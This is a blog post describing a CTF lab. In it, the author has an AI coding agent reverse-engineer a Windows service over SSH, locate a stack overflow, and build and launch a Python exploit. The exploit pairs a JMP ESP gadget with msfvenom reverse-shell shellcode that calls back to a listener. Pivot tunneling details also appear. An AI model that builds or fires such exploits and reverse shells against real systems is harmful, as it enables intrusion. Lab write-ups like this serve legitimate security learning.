Introduction
Last weekend I was working on a CTF lab where capturing one of the flags required exploiting a local service vulnerable to a stack overflow. I had limited shell access on that system, through an application remote code execution vulnerability, which allowed me identify a service listening on port 8080 on localhost.
The underlying operating system was Windows 10, which led to an immediate challenge of matching environment for debugging the binary and developing a working exploit and I did not have access to intel-based machine. This is where Claude Opus came into the picture. Out of curiosity I asked Claude to write an exploit without the Windows 10 machine and it helped me with a working exploit within few minutes.
Setup
The Setup that I used was,
- MacOS with Claude Desktop and Opus 4.6 model - Host system used during the CTF
- Kali Linux ARM as virtual machine - System with VPN connection to the lab
- Vulnerable binary downloaded and copied to Kali Linux
- Double pivot tunnel using Ligolo-ng - Advanced tunneling tool (alternative to Chisel)
Establishing Access to Port 8080
Below is the network diagram of the lab where the target server is the system running vulnerable binary on port 8080 on localhost.
In order to access the Target Server, I used Ligolo-ng for tunneling. Below is the summary of the steps carried out to establish the tunnel.
- The Linux Server on 10.10.100.10 had the Ligolo-ng agent connected to Ligolo-ng proxy running on Attackers system.
- A route to 172.20.10.0/24 via tunnel 1 was added to Attackers system.
- A listener was added to this Linux Server where connection on port 4444 would be forwarded to port 11601 which is the Ligolo-ng agent port.
- Ligolo-ng agent on Target Server connected to listener port 4444 on Linux Server which forwarded the traffic to Ligolo-ng agent and that established the connection with Ligolo-ng proxy running on Attackers system.
- A route to 240.0.0.1/24 via tunnel 2 was added to Attackers system. 240.0.0.0/4 is a magic CIDR that allows access to local ports on connected agents.
Now that the Kali Linux can reach vulnerable service using 240.0.0.1:8080, it was time to point Claude Code to this Kali system and let it run. The objective was to provide Claude Code access to the environment where all tools were installed and also the route to the affected service was setup.
Below section, contains the prompt used and output from Claude Opus 4.6.
Note: I have modified some text to prevent disclosure of sensitive information (both about my network or related to the CTF solution.)
Prompt 1:
There is the vulnerable.exe file under path /home/analyst/Desktop/ctf/ on Kali virtual machine which is vulnerable to stack overflow. This is part of the CTF where the machine on which this vulnerable.exe is running has below configuration. It is listening on port 8080 on IP 240.0.0.1.
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
I want your help to come up with an exploit written in Python for this. I have the tools you need installed on Kali Linux ARM virtual machine. You can SSH to this Kali Linux using 192.168.10.10 IP address and user analyst. The SSH password is <redacted>. I do not have Windows 10 machine where I can debug the binary so check if you can write the exploit using the current setup.
Claude Output:
Claude Code taking initial SSH access to Kali Linux
I'll help you with this CTF challenge. Let me SSH into your Kali VM and examine the binary first.
SSH requires interactive password input. Let me use `expect` to automate the login.
Initial analysis of the file, basically what you would normally do using file and checksec
Good - it's a PE32 executable (32-bit Intel i386 Windows binary). Let me do deeper static analysis.
Excellent! This is a network service that asks for a password. Let me get more details about the binary structure and look for the password handling and vulnerability.
Now let me disassemble the binary to find the vulnerability details.
Radare2 is available. Let me use it to analyze the binary - find the vulnerability, check protections, and find useful gadgets.
Key findings:
- 32-bit x86 PE binary
- NX (DEP) is disabled (nx: false) - we can execute shellcode on the stack!
- ASLR/PIC disabled (pic: false) - addresses are predictable
- Canary: true - but let's verify if it's actually used in the vulnerable function
- Compiled with MSVC (Windows)
File reversing to understand the application input flow
Now let me analyze the vulnerable function to find the overflow offset.
Let me look at the main function and the function that handles the password/recv to find the overflow.
Main calls fcn.1047440e. Let me disassemble that function.
It jumps to fcn.10477d80. Let me disassemble that - this should be the main server function.
So after accept(), it calls fcn.1047299c which handles the client connection. Let me disassemble that function - this is likely where the vulnerability lives.
Another jump. Let me follow it to fcn.10477d10.
Now I can see the flow:
- Server sends "Enter User Name: "
- Receives username, compares with "iroot" (5 bytes)
- If username is "iroot", sends "User Password: " and receives password
- Then calls fcn.10473ac7 with the password buffer
The password handling function fcn.10473ac7 is likely where the overflow happens. Let me analyze it and the recv function.
Identify JMP ESP address
Now I found the vulnerability. Let me also look at the fcn.10472631 function which copies the data, and check what recv function looks like.
This is strncpy_s or similar. Now let me also look at the recv function (fcn.1047269f) which reads user input and check if it has size limits.
Now I have a clear picture. Let me find a JMP ESP gadget for the exploit.
Found JMP ESP gadgets. Let me check these addresses for null bytes:
- 0x10477d73 = \x73\x7d\x47\x10 - no null bytes!
Let me also search for CALL ESP as a backup, and verify the JMP ESP gadget is in executable section.
Vulnerability Summary
I now have all the information needed. Here's the vulnerability summary:
Vulnerability Analysis:
- Password handler (0x10477cb0) allocates a 1024-byte (0x400) stack buffer
- Calls strncpy_s(stack_buf, 2049, user_input, 2048) - copies up to 2048 bytes into a 1024-byte buffer
- DEP disabled, ASLR disabled, no stack canary in the vulnerable function
- JMP ESP gadget at 0x10477d73 (no null bytes)
- EIP overwrite offset: 1024 (buffer) + 4 (saved EBP) = 1028 bytes
- Bad character: 0x00 (null terminates strncpy_s)
Adjusting Exploit and Gaining Shell :)
Let me generate shellcode and write the exploit.
Now let me write the complete exploit script and deploy it to the Kali VM.
Let me verify the exploit runs without errors (the assertions pass) and test connectivity to the target.
Good results:
Offset confirmed: sizes up to 1050 returned responses, size 1100 crashed the server — so EIP overwrite is somewhere between 1050 and 1100. This means there might be slight additional padding (compiler alignment). Let me also note that 1032 returned empty (no "Wrong password!") which is interesting — we're starting to corrupt the stack there.
Kali IP: 10.10.14.22 (on tun0 — this is the VPN interface to reach the target)
The offset might need a small adjustment. Let me run a more precise scan around the 1032-1100 range, and simultaneously generate shellcode.
The results confirm our analysis. Key observations:
- Sizes 1028-1040 return "Wrong password!" — this is expected because the server sends the response before the function returns and crashes
- Crashes start at 1044+ — the intermittent timeouts mean the thread crashes on ret after we corrupt EIP
- Offset 1028 is correct — at 1032 bytes we overwrite EIP (1028 padding + 4 bytes of return address)
- The Kali IP on tun0 is 10.10.10.200. Let me generate shellcode and finalize the exploit.
Shellcode generated — 351 bytes, shikata_ga_nai encoded, no null bytes. Now let me update the exploit and deploy it.
Now copy the updated exploit to Kali, start a listener, and fire it.
Now start the netcat listener in the background, then fire the exploit:
Exploit sent successfully! Let me check if the shell connected to our listener:
We got a reverse shell! The exploit worked perfectly.
Prompt 2:
Explain the role of exploit.py and fine_scan.py files that you generated.
Claude Output:
fine_scan.py - EIP Offset Finder
This is a reconnaissance script used to pinpoint the exact buffer size that crashes the target. It:
- Connects to the Server on 240.0.0.1:8080
- Authenticates with username iroot
- Sends increasingly large payloads (1028 to 1080 bytes, in 4-byte increments) as the "password"
- Reports whether each size keeps the server alive or causes a crash/timeout
The goal is to find the precise EIP overwrite offset — the exact number of bytes needed to overwrite the saved return address on the stack. The transition from "ALIVE" to "CRASH" tells you the offset is between those two sizes.
exploit.py - Stack Buffer Overflow Exploit
This is the actual exploit that leverages the vulnerability found by fine_scan.py. The attack chain:
- Vulnerability: The Server's password handler (fcn.10477cb0) allocates a 1024-byte (0x400) stack buffer but calls strncpy_s allowing up to 2048 bytes — a classic stack buffer overflow.
- Payload structure (1398 bytes total):
- 1028 bytes of "A" — fills the buffer (1024) + saved EBP (4)
- JMP ESP gadget (0x10477d73) — overwrites the return address (EIP) to jump to the stack
- 16-byte NOP sled — landing zone for the jump
- 351-byte shellcode — msfvenom-generated windows/shell_reverse_tcp (shikata_ga_nai encoded, no null bytes
- Execution flow: Connects to the server, sends Admin as username, then sends the overflow payload as the password. The server's ret instruction jumps to the gadget, which jumps to ESP (the NOP sled), which slides into the reverse shell shellcode connecting back to 10.10.10.200:443.
In short: fine_scan.py found where to aim, and exploit.py delivers the payload that gives you a remote Windows shell.
Conclusion
Using Claude to tackle CTF challenges turned out to be a genuinely rewarding experience. What started as a shortcut to avoid hunting down a remote Windows 10 setup ended up being something exciting. Agreed that the above example was relatively simple and the model would have struggled or not worked if there were more bad characters, or ASLR/DEP Enabled, but the results were compelling enough to try it further on other CTFs simple and complex alike.
No comments:
New comments are not allowed.